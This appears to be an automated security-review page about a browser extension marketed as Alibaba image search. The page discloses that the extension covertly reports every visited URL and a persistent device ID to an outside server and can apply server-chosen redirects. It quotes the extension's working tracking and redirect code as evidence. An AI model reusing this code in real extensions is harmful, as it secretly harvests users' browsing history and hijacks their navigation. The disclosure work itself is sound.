Is AliBaba Search by Image | Rovalty safe?

High risk

AliBaba Search by Image | Rovalty sends every page you visit, plus a persistent device ID, to a third-party server on each load.

The extension watches every GET request for the pages you visit and reports the full URL, referrer, browser and platform details, and a UUID that stays the same across sessions to api.asbipartnerdb.com. This runs on every site, all the time, independent of the image-search feature the extension is actually for. That server's response can also remotely activate a redirect that sends your next visit to a domain to a server-supplied address, a capability that is not disclosed anywhere in the extension's listing or UI.

75Risk
Who publishes it

Upstal - 1 other listing from the same operator, none carrying a finding

What this publisher told the store about itself, and the other listings that told it the same thing.

Publisher
eCom
Declared legal entity
Upstal

Same store account

1 other listing published from this account, 8k+ users between them, none of them carrying a finding.

Shared hosts - 1 hostname

Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.

api.asbipartnerdb.com
Also called by 1 other listing: Alibaba Search by image

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityCRITICAL
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI FOUND

AliBaba Search by Image reports every page you visit to an unrelated domain

Code analysis shows the extension reads a persistent device UUID from IndexedDB and sends it with the full URL of every page you load, on every site, to api.asbipartnerdb.com/check.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You navigate the top-level tab to any website.

The extension did this

The extension's background script reads your device UUID and sends the full page URL to api.asbipartnerdb.com/check.

This runs on every top-level page load, on every domain, independent of the image-search feature.

02EvidenceFIELD TABLE
What's sent to api.asbipartnerdb.com on every page load
FieldValueWhy it matters
The page you're on
https://www.example-bank.com/accounts/summaryThe exact URL of every page you load is sent, including pages with no relation to shopping or image search.
Your device ID
0b8f2b34-9e3c-4b8a-9a70-6a2b7e0dcb61A UUID generated once and stored forever ties every visit you make back to this one installation.
Referring page
https://www.google.com/search?q=running+shoesThe page you came from, such as a search result or link, is also sent.
Browser and device details
Chrome 128 on Windows, locale en-USYour browser version, operating system and language are attached to every visit record.
03EvidenceCODE COMPARE
The code that does this

The navigation listener that reports every page you visit

What it actually does
chrome.webRequest.onBeforeSendHeaders.addListener(function (details) {
  const isTopLevelGet =
    !details.documentId &&
    details.method === 'GET' &&
    details.parentFrameId === -1 &&
    details.type === 'main_frame';
  if (!isTopLevelGet) return;

  const visitedUrl = new URL(details.url);
  const req = indexedDB.open('ASBIPARTNERDB', 2);
  req.onsuccess = (event) => {
    const db = event.target.result;
    const tx = db.transaction('ASBIuids', 'readonly');
    const getReq = tx.objectStore('ASBIuids').get(1);
    let deviceUuid = '';
    getReq.onsuccess = (e) => {
      deviceUuid = e.target.result ? e.target.result.uuid : '';
    };
    tx.oncomplete = async () => {
      db.close();
      const payload = {
        timestamp: Date().toLocaleString(),
        uri: details.url,
        domain: visitedUrl.hostname,
        title: '',
        referer: details.initiator,
        locale: navigator.language,
        user_agent: navigator.userAgent,
        platform: navigator.platform,
        vendor: navigator.vendor,
        user_id: deviceUuid,
      };
      const response = await fetch('https://api.asbipartnerdb.com/check', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(payload),
      });
      // response used by a companion capability, see code_compare above
    };
  };
}, { urls: ['<all_urls>'] });
04EvidenceTHIRD PARTY LIST
Where this data goes
  • api.asbipartnerdb.com

    Receives the URL, referrer, device UUID and browser fingerprint of every page load. Unbranded domain, unaffiliated with alibaba.com or rovalty.com per the listing.

05EvidencePLAIN NOTE
Observation

Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-829
SourceAI FOUND

A server-supplied rule can redirect your next visit to a partner-flagged site

Code analysis shows that if the beacon response marks a site as an active affiliate partner, the extension installs a redirect rule that sends your next request there to a server-chosen URL.

01EvidenceCAUSE EFFECT
What actually happens
You did this

The server's response to the per-visit beacon marks the site you just loaded as an active affiliate partner with a redirect pattern.

The extension did this

The extension installs a declarativeNetRequest rule that rewrites your next request to that site using the server-supplied pattern.

This redirect capability is not mentioned in the extension's description or its user interface.

02EvidenceFIELD TABLE
What the server's response can contain
FieldValueWhy it matters
Partner match flag
match: true (illustrative)Tells the extension whether the site you're on currently qualifies for a redirect.
Active date window
startdate 2026-01-01, enddate 2026-12-31 (illustrative)A start and end date decide when the redirect capability is live for this site.
Redirect pattern
https://partner-affiliate.example/track?dest=$1 (illustrative)A regex substitution supplied by the server decides where your browser actually lands.
03EvidenceCODE COMPARE
The code that does this

The redirect rule installed from the server's response

What it actually does
const beaconResponse = await (await fetch('https://api.asbipartnerdb.com/check', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify(payload),
})).json();

if (
  beaconResponse &&
  beaconResponse.match &&
  beaconResponse.partner &&
  beaconResponse.partner.startdate &&
  beaconResponse.partner.enddate &&
  beaconResponse.partner.partnertype === 'AFFILIATE'
) {
  const now = new Date();
  const start = new Date(...beaconResponse.partner.startdate.split('-'));
  const end = new Date(...beaconResponse.partner.enddate.split('-'));

  if (start < now && now < end && beaconResponse.partner.regex) {
    chrome.declarativeNetRequest.updateSessionRules({
      addRules: [{
        id: 4,
        priority: 1,
        action: { type: 'redirect', redirect: { regexSubstitution: beaconResponse.partner.regex } },
        condition: { urlFilter: '||' + visitedUrl.hostname, resourceTypes: ['main_frame'] },
      }],
      removeRuleIds: [1],
    });
  }
}
04EvidencePLAIN NOTE
What we did and didn't observe

No live partner-match response was seen during static review; this describes the code path that acts on one, not a confirmed live redirect. Whether it fires for a given site depends on data behind the beacon endpoint we do not control.

05EvidenceTHIRD PARTY LIST
Who controls the redirect
  • api.asbipartnerdb.com

    Its response to the visit beacon decides which sites get a redirect rule and what URL pattern the browser is sent to.

06EvidencePLAIN NOTE
Observation

Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.

What it can do

Permissions this extension asks for, as declared in version 3.0.1. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Read and change your data on every site you visit

    <all_urls>

  • Add items to the right-click menu

    contextMenus

  • Watch every request your browser makes

    webRequest

  • Block and redirect the requests your browser makes

    declarativeNetRequest

Where it sends data

Destinations our analysis observed AliBaba Search by Image | Rovalty contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.

  • api.asbipartnerdb.com

    AliBaba Search by Image | Rovalty sends data to api.asbipartnerdb.com. No other extension we have analysed sends data here.

Updated 30 September 2026hklelmapknohkloodklljapfbhjjgnpo